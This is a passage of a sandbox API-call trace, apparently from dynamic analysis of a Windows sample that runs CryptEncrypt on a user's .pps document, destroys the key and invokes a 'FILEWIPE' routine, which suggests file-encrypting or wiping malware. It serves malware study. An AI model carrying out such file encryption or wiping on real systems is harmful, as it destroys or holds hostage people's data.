1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.143] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.144] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.145] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.145] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.145] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.145] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.145] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.145] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.145] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.147] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x9f51, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x9f60) returned 1 [0178.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.148] CharLowerBuffW (in: lpsz="byte[40801]", cchLength=0xb | out: lpsz="byte[40801]") returned 0xb [0178.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.151] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.151] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.151] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0x9f51, dwBufLen=0x9f60 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0x9f60) returned 1 [0178.151] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.151] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.151] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.154] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.161] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.161] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.161] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.161] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.161] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.161] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.161] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.161] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.161] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.161] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.167] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.167] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.167] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.173] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0178.173] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.173] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0178.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.173] CryptDestroyKey (hKey=0x90af98) returned 1 [0178.173] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.173] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.174] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.174] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.174] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.174] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.174] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.174] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.174] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.174] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.174] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.174] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.174] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.174] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.175] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.175] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0178.175] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.175] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.175] FreeLibrary (hLibModule=0x74f20000) returned 1 [0178.175] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.175] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.175] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.175] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.176] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.179] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.179] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0178.179] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.179] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, ftLastWriteTime.dwLowDateTime=0x96ac91b0, ftLastWriteTime.dwHighDateTime=0x1d5dda2, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 0x90af58 [0178.179] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.180] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0178.180] CharLowerBuffW (in: lpsz="byte[40785]", cchLength=0xb | out: lpsz="byte[40785]") returned 0xb [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.182] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.182] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0178.182] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.182] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.182] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c28e8 [0178.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c28e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.183] RtlAllocateHeap (HeapHandle=0x8a0000, 